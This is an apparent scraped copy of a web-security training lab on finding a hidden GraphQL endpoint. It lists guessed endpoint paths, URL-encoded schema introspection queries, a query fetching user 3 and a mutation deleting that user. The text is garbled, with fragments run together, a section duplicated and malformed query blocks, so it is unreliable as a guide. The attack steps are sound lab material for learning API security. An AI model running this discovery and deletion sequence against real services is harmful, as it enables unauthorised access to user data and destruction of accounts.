Lab: Finding a hidden GraphQL endpoint
Steps
/graphql
/api
/api/graphql
/graphql/api
/graphql/graphqlGET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7Dquery{__schema
{queryType{fields{name description}}}
}Last updated
/graphql
/api
/api/graphql
/graphql/api
/graphql/graphqlGET /graphql?query=query%7B__schema%0A%7BqueryType%7Bname%7D%7D%7Dquery{__schema
{queryType{fields{name description}}}
}Last updated
query{__schema
{mutationType{fields{name description}}}
}query{__schema
{queryType{fields{name description}}}
getUser(id:3)
{
id
username
}
}mutation{
deleteOrganizationUser(input:{id:3})
{
user {id}
}
}